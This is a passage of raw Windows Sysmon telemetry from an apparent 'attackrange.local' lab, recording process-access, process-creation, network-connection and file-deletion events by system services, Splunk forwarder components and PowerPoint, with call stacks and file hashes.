14:58:57.044{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC31-607E-550F-00000000BB01}4788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081293Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.028{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC31-607E-550F-00000000BB01}4788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081292Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:57.028{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC31-607E-550F-00000000BB01}4788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050682Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:57.768{85C0FFC9-EC31-607E-F406-00000000BB01}928348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050681Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:57.658{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EC31-607E-F406-00000000BB01}928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050680Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:57.658{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050679Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:57.658{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050678Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:57.658{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050677Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:57.658{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050676Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:57.658{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050675Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:57.658{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050674Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:57.658{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050673Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:57.658{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050672Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:57.658{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050671Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:57.658{85C0FFC9-B7EC-607E-0500-00000000BB01}4161008C:\Windows\system32\csrss.exe{85C0FFC9-EC31-607E-F406-00000000BB01}928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050670Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:57.658{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EC31-607E-F406-00000000BB01}928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050669Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:57.659{85C0FFC9-EC31-607E-F406-00000000BB01}928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000050668Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:54.780{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52543-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x800000000000000050667Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:57.112{85C0FFC9-EC30-607E-F306-00000000BB01}18842152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000081358Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.794{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1B326E2383DD8BDC500B4032E3C3294D,SHA256=EACB31B46A53C8E29DAA571FB6A2A02226CF2305A65F4DC801A66BC6EE31E3AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081357Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.778{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4006.tmpMD5=C47E3430AF813DF8B02E1CB4829DD94B,SHA256=F2DB1E60533F0D108D5FB1004904C1F2E8557D4493F3B251A1B3055F8F1507A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081356Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.778{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4005.tmpMD5=B4312FCA4A8A21F8905311D4427E87BB,SHA256=4087D3C1E0D93567E67FC8F17CD3AD5587C2FC203B1BBEB8D7A01A750D54E924,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081355Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.778{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD402E.tmp\Content.infMD5=1309D172F10DD53911779C89A06BBF65,SHA256=C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081354Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.763{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4018.tmpMD5=486CBCB223B873132FFAF4B8AD0AD044,SHA256=B217393FD2F95A11E2C594E736067870212E3C5242A212D6F9539450E8684616,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081353Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.763{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4019.tmpMD5=7BF88B3CA20EB71ED453A3361908E010,SHA256=E555A610A61DB4F45A29A7FB196A9726C25772594252AD534453E69F05345283,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081352Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.763{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD4029.tmp\content.infMD5=B49384CBC2C04035CAFFB84C03499751,SHA256=82CD4A0EF475B600B835565B188702CB4B6CCF0398C13FE27C40C6788396739F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081351Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.763{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab3FF4.tmpMD5=4EFA48EC307EAF2F9B346A073C67FCFB,SHA256=3EE9AE1F8DAB4C498BD561D8FCC66D83E58F11B7BB4B2776DF99F4CDA4B850C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081350Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.763{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4017.tmpMD5=7C645EC505982FE529D0E5035B378FFC,SHA256=298FD9DADF0ACEBB2AA058A09EEBFAE15E5D1C5A8982DEE6669C63FB6119A13D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081349Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.731{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD402D.tmp\Content.infMD5=69757AF3677EA8D80A2FBE44DEE7B9E4,SHA256=0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081348Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.731{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD402A.tmp\Content.infMD5=52BD0762F3DC77334807DDFC60D5F304,SHA256=30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081347Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.716{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD402C.tmp\Content.infMD5=C1B36A0547FB75445957A619201143AC,SHA256=4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081346Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.716{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD402B.tmp\Content.infMD5=4DD225E2A305B50AF39084CE568B8110,SHA256=6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081345Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.497{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBCF-607E-BF0B-00000000BB01}4488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081344Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 